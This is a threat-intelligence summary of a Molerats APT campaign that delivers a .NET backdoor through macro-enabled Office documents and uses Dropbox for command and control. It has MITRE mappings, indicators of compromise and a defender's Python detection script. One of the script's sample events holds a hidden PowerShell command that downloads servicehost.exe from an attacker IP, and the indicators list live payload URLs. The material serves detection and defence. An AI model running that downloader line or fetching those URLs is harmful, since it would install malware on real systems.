ThreatLabz details a new Molerats APT espionage campaign targeting Middle East actors, delivering a .NET backdoor via macro-enabled Office documents and leveraging Dropbox as the C2 and data-exfiltration channel. The operation shows ties to Spark backdoor activity and Molerats infrastructure, with targets including Palestine’s banking sector, Palestinian political figures, and Turkish journalists, and uses cloud services for command and control.
#MoleratsAPT #SparkBackdoor #DropboxC2 #msupdata #PalestineBanking #TurkeyJournalists
Key points
- Campaign is attributed to Molerats APT based on multiple indicators (packers, C2 methods, geographies, domain reuse).
- Active since July 2021, with a distribution method shift in December 2021 and minor .NET backdoor changes.
- Macro-based MS Office documents with Israel/Palestine decoy themes deliver Stage-1 and Stage-2 payloads.
- .NET backdoor (servicehost.exe) is ConfuserEx packed and masquerades as WinRAR; some samples use Themida packing.
- C2 and data exfiltration run through Dropbox API (and in some chains Google Drive), with a Dropbox token embedded in the binary.
- Targets include Palestinian banking sector personnel, Palestinian political figures, human rights activists, and Turkish journalists.
- Old and new attack chains differ in backdoor delivery and token retrieval (old used justpaste.it; new uses attacker-hosted content).
MITRE Techniques
- [T1566.001] Spearphishing Attachment – Uses document attachments that carry a VBA macro. Quote: ‘Uses doc based attachments with VBA macro’
- [T1204.002] User Execution: Malicious File – The user opens the document and enables the VBA macro. Quote: ‘User opens the document file and enables the VBA macro’
- [T1059.001] Command and Scripting Interpreter: PowerShell – The VBA macro launches PowerShell to download and execute the payload. Quote: ‘VBA macro launches PowerShell to download and execute the payload’
- [T1140] Deobfuscate/Decode Files or Information – Strings and other data in the payload are obfuscated and decoded at runtime. Quote: ‘Strings and other data are obfuscated in the payload’
- [T1082] System Information Discovery – The backdoor sends the processor architecture and computer name to the C2. Quote: ‘Sends processor architecture and computer name’
- [T1083] File and Directory Discovery – Files are located on the victim machine for upload. Quote: ‘Upload file from victim machine’
- [T1005] Data from Local System – Files are collected from the victim machine and uploaded. Quote: ‘Upload file from victim machine’
- [T1567.002] Exfiltration to Cloud Storage – Collected data is uploaded to Dropbox through the Dropbox API. Quote: ‘Data is uploaded to Dropbox via api’
- [T1113] Screen Capture – C2 command code “2” takes a screenshot and uploads it to the attacker-controlled Dropbox account. Quote: ‘The C2 command code “2” corresponds to taking a screenshot and uploading to attacker-controlled Dropbox account’
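As an added defender-side example (not from the ThreatLabz report), the following Python sketch runs two detections over constructed Sysmon-style process and network events that mirror the chain above: an Office application spawning a PowerShell downloader, and a dropped binary in a user-writable path beaconing to a cloud-storage API. The event format, field names and the legitimate-client sample are assumptions; the download URL is the one listed in the indicators.

```python
import re
from pathlib import PureWindowsPath

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# Cloud-storage API hosts that this chain abuses for C2 and exfiltration.
CLOUD_API_HOSTS = {"api.dropboxapi.com", "content.dropboxapi.com", "drive.google.com"}
# Directories a macro-launched downloader can write to without elevation.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")
DOWNLOAD_RE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|https?://", re.I)
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Constructed sample events (assumed key=value format, not real telemetry).
SAMPLE_EVENTS = [
    r'''event=ProcessCreate parent=WINWORD.EXE image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell -w hidden -c (New-Object Net.WebClient).DownloadFile('http://45.63.49.202/document.html','C:\Users\a\AppData\Roaming\servicehost.exe')"''',
    r'''event=ProcessCreate parent=explorer.exe image="C:\Program Files\WinRAR\WinRAR.exe" cmdline="WinRAR.exe x details.rar"''',
    r'''event=NetworkConnect image=C:\Users\a\AppData\Roaming\servicehost.exe dest_host=api.dropboxapi.com dest_port=443''',
    r'''event=NetworkConnect image="C:\Program Files (x86)\Dropbox\Client\Dropbox.exe" dest_host=api.dropboxapi.com dest_port=443''',
]

def parse_event(line):
    """Parse one key=value event line; quoted values may contain spaces."""
    return {k: (q if q else u) for k, q, u in KV_RE.findall(line)}

def basename(path):
    return PureWindowsPath(path).name.lower()

def detect(lines):
    """Return (rule, ATT&CK ids, image) tuples for events matching either rule."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        img = ev.get("image", "")
        # Rule 1: Office parent -> PowerShell child whose command line fetches something.
        if (ev.get("event") == "ProcessCreate"
                and basename(ev.get("parent", "")) in OFFICE_APPS
                and basename(img) in SHELLS
                and DOWNLOAD_RE.search(ev.get("cmdline", ""))):
            findings.append(("office_spawns_powershell_download", "T1566.001/T1204.002/T1059.001", img))
        # Rule 2: binary outside Program Files/System32 talking to a cloud-storage API.
        elif (ev.get("event") == "NetworkConnect"
                and ev.get("dest_host", "").lower() in CLOUD_API_HOSTS
                and any(d in img.lower() for d in USER_WRITABLE)):
            findings.append(("cloud_api_from_user_writable_path", "T1567.002", img))
    return findings

if __name__ == "__main__":
    for rule, ttps, img in detect(SAMPLE_EVENTS):
        print(f"{rule} [{ttps}]: {img}")
```

The legitimate Dropbox client under Program Files and the real WinRAR launch are left alone, so the rules key on the masquerading binary's location rather than its name.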
Indicators of Compromise
- [MD5] – Document/decoy files: 46e03f21a95afa321b88e44e7e399ec3 (15-12.doc) and 5c87b653db4cc731651526f9f0d52dbb (11-12.docx)
- [MD5] – Additional payloads: 105885d14653932ff6b155d0ed64f926 (report2.dotm)
- [MD5] – Payloads/executables: ebc98d9c96065c8f1c0f4ce445bf507b (servicehost.exe); c7271b91d190a730864cd149414e8c43 (su.exe); 00d7f155f1a9b29be2c872c6cad40026 (servicehost.exe)
- [MD5] – RAR payloads: 2dc3ef988adca0ed20650c45735d4160 (cairo hamas office.rar); b9ad53066ab218e40d61b299bd2175ba (details.rar); bd14674edb9634daf221606f395b1e1d (moi.rar); 59368e712e0ac681060780e9caa672a6 (meeting.rar); 99fed519715b3de0af954740a2f4d183 (ministry of the interior 23-9-2021.rar)
- [Domain] msupdata.com; www.msupdate.com – Domains that resolved to Molerats infrastructure (SSL thumbprint overlap noted); www.msupdata.com has passive DNS history pointing to Molerats IPs
- [IP] 45.63.49.202; 23.94.218.221; 185.244.39.165 – IPs used in C2 and hosting infrastructure
- [URL] drive.google.com/uc?export=download&id=1xwb99Q7duf6q7a-7be44pCk3dU9KwXam – Template download URL for payloads
- [URL] http://45.63.49.202/document.html; http://23.94.218.221/excelservice.html; http://45.63.49.202/doc.html; http://45.63.49.202/gabha.html – Exfil/payload delivery endpoints
- [Certificate] SSL thumbprint ec5e468fbf2483cab74d13e5ff6791522fa1081b – Historical certificates linked to Molerats infrastructure